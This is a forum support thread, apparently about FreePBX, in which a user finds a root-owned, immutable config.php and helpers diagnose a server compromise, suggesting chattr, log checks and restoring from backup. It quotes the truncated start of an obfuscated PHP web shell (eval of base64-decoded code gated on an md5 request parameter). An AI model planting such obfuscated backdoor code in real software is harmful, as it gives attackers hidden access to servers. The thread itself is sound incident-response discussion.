GUI gone and can't enable framework

I went to update a system today and found the GUI gone. Logged in at the root level and found framework disabled. When I go to install it I see the following error:

  unlink(/var/www/html/admin/views/config.php): Operation not permitted

When I run fwconsole chown I see

[[email protected] ~]# fwconsole chown
Taking too long? Customize the chown command, See
Setting Permissions...
Setting base permissions...chmod: changing permissions of `/var/www/html/admin/views/config.php': Operation not permitted
chown: changing ownership of `/var/www/html/admin/views/config.php': Operation not permitted
Setting specific permissions...
 28316 [============================]
Finished setting permissions

I found the config.php file and I can’t delete it. In it there is:

<?php /*oe09qFfPBzO0bag26EQa4MHZ*/eval/*jsOUUhGivGsWmH*/(base64_decode/*LYhzYsJf*/('c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJiYgbWQ1KCRfUkVRVUVTVFsn

You’ve been compromised, that file is not legit. You can prob remove by changing attributes chattr first.

I had a feeling it was compromised. I’m not familiar with the chattr command but I"ll give it a shot. Thank you.

Before you change it, provide output of:

ll /var/www/html/admin/views/config.php

and if the above is not the full content share it all via pastbin:

pastebin /var/www/html/admin/views/config.php

ll /var/www/html/admin/views/config.php

-rwSr–r-- 1 root root 4759 Jun 14 2018 /var/www/html/admin/views/config.php

This is not good, the spurious file is owned by root. Look for evidence of ssh login from unknown IPs in /var/log/secure. See if the Apache or Asterisk services are running as root (they should not be).

If you have a root compromise, i fear you are in restore from backup territory.

How do I check to see if asterisk or apache is running as root?

This topic was automatically closed 31 days after the last reply. New replies are no longer allowed.